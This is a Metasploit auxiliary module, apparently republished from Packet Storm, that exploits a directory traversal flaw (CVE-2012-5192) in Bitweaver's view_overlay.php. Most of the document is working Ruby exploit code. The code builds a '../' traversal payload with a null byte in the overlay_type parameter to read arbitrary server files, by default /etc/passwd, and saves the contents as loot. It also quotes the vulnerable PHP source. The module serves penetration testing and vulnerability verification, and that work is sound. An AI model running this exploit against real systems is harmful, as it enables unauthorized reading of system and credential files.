This Metasploit module exploits a directory traversal vulnerability found in Bitweaver. When handling the overlay_type parameter, view_overlay.php fails to do any path checking/filtering, which can be abused to read any file outside the virtual directory.
75260c8739219589832630db597ad076c6fa9dee26583aeb19f2537f54e959f0##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Bitweaver overlay_type Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability found in Bitweaver.
When handling the 'overlay_type' parameter, view_overlay.php fails to do any
path checking/filtering, which can be abused to read any file outside the
virtual directory.
},
'References' =>
[
['CVE', '2012-5192'],
['OSVDB', '86599'],
['EDB', '22216'],
['URL', 'https://www.trustwave.com/spiderlabs/advisories/TWSL2012-016.txt']
],
'Author' =>
[
'David Aaron', # Trustwave SpiderLabs
'Jonathan Claudius', # Trustwave SpiderLabs
'sinn3r' # Metasploit
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2012-10-23'
))
register_options(
[
OptString.new('TARGETURI', [true, 'The URI path to the web application', '/bitweaver/']),
OptString.new('FILE', [true, 'The file to obtain', '/etc/passwd']),
OptInt.new('DEPTH', [true, 'The max traversal depth to root directory', 10])
])
end
def run_host(ip)
base = target_uri.path
peer = "#{ip}:#{rport}"
fname = datastore['FILE']
fname = fname[1, fname.length] if fname =~ /^\//
print_status("Reading '#{datastore['FILE']}'")
traverse = "../" * datastore['DEPTH']
res = send_request_cgi({
'method' => 'GET',
'encode_params' => false,
'uri' => normalize_uri(base, "gmap/view_overlay.php"),
'vars_get' => {
'overlay_type' => "#{traverse}#{fname}%00"
}
})
if res and res.code == 200 and res.body =~ /failed to open stream\: No such file/
print_error("Cannot read '#{fname}'. File does not exist.")
elsif res and res.code == 200 and res.body =~ /failed to open stream\: Permission denied/
print_error("Cannot read '#{fname}'. Permission denied.")
elsif res and res.code == 200 and res.body =~ /Failed opening required/
print_error("Cannot read '#{fname}'. Possibly not vulnerable.")
elsif res and res.code == 200
data = res.body
data = (data.scan(/(.+)\n(<br \/>)*\n*.+Notice.+/m).flatten[0] || '').gsub(/\n<br \/>$/, '')
p = store_loot(
'bitweaver.overlay_type',
'application/octet-stream',
ip,
data,
fname
)
vprint_line(data)
print_good("#{datastore['FILE']} stored as '#{p}'")
else
print_error("Request failed due to some unknown reason")
end
end
end
=begin
if( !empty( $_REQUEST['overlay_type'] ) ){
$type = $_REQUEST['overlay_type'];
}
// Now check permissions to access this page
$gBitSystem->verifyPermission('p_gmap_overlay_view' );
// Get the overlay for specified overylay_id
require_once(GMAP_PKG_PATH.'lookup_'.$type.'_inc.php' );
=end
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed